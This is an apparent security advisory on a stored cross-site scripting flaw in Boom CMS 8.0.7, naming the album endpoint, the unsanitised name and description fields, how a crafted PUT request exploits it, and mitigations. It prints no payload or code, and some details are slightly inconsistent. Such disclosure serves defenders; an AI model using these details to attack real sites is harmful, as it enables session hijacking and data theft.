Boom CMS assets-manager add cross site scripting

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in Boom CMS version 8.0.7 within the assets-manager component. The add function does not sanitize the title and description parameters when creating or updating an album, allowing arbitrary JavaScript to be injected and stored. The vulnerable endpoint is asset-manager/albums/[ID] [1].

Exploitation

An attacker with network access to the Boom CMS instance can send a crafted HTTP PUT request to the album endpoint with malicious payloads in the name and description JSON fields. The PoC demonstrates injection of script code that is then reflected when the album page is loaded. No authentication is required if the endpoint is exposed, but typically the attacker would need a valid session to modify albums. The exploit has been publicly disclosed [1].

Impact

Successful exploitation leads to stored XSS, enabling an attacker to execute arbitrary JavaScript in the context of a victim's browser when they view the affected album. This can result in session hijacking, defacement, or theft of sensitive data. The attack is remote and does not require elevated privileges beyond the ability to modify album metadata [1].

Mitigation

As of the publication date (2023-07-20), no official patch has been released for Boom CMS 8.0.7. Users should restrict access to the assets-manager endpoints, apply input validation and output encoding for the title and description fields, or upgrade to a patched version if available. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog [1].